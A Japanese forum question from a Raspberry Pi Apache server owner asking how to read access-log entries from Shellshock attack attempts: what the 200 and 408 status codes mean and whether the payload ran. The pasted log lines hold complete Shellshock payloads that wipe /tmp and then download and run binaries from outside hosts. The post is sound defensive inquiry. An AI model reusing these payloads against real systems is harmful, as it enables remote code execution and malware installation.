[環境]
Linux raspberrypi 3.18.14-v7+
Apache/2.2.22 (Debian)
GNU bash, version 4.2.37(1)-release
PHP 5.4.41-0+deb7u1
はじめまして。
現在Apacheで動作しているサーバーのアクセスログに以下のような記録がありました。
lang
1222.186.56.51 - - [25/Jun/2015:21:11:03 +0900] "GET / HTTP/1.1" 200 533 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.56.51:5566/offce -O /tmp/China.Z-uotj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-uotj >> /tmp/Run.sh;echo /tmp/China.Z-uotj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.56.51:5566/offce -O /tmp/China.Z-uotj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-uotj >> /tmp/Run.sh;echo /tmp/China.Z-uotj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" 2 3222.186.56.51 - - [25/Jun/2015:21:23:13 +0900] "GET / HTTP/1.1" 200 533 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-ppmw\x90 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-ppmw\x90 >> /tmp/Run.sh;echo /tmp/China.Z-ppmw\x90 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-ppmw\x90 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-ppmw\x90 >> /tmp/Run.sh;echo /tmp/China.Z-ppmw\x90 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" 4 558.213.123.107 - - [26/Jun/2015:06:07:10 +0900] "GET / HTTP/1.1" 200 533 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://202.103.243.104:911/1122.32 -O /tmp/China.Z-toqj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-toqj >> /tmp/Run.sh;echo /tmp/China.Z-toqj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://202.103.243.104:911/1122.32 -O /tmp/China.Z-toqj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-toqj >> /tmp/Run.sh;echo /tmp/China.Z-toqj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" 6 761.161.130.253 - - [27/Jun/2015:02:13:31 +0900] "GET / HTTP/1.1" 408 417 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://202.103.243.104:911/sudp -O /tmp/China.Z-wsoc >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wsoc >> /tmp/Run.sh;echo /tmp/China.Z-wsoc >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "-" 8
ShellShockによって/tmp以下にシェルスクリプトを持ってきて実行したのち消す、というものだと思います。
今回質問させていただきたいのは、
1.最後のアクセスログ以外はHTTPステータスコードが200になっていますが、これはどのようなリクエストが成功したことを表すのでしょうか
2.最後のアクセスログのみHTTPステータスコードが408になっているのは、他のリクエストとどのような違いがあるためでしょうか
3.シェルスクリプトは実行されたのでしょうか
の3点です。
3.については何か転送されているようにも見えないので、おそらく大丈夫なのでは...と考えたのですが、何か見落としているのに気付いていないかもしれませんので申しわけありませんが質問させていただきます。
なにとぞよろしくお願いいたします。
回答1件
あなたの回答
tips
プレビュー
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。
2015/06/27 07:52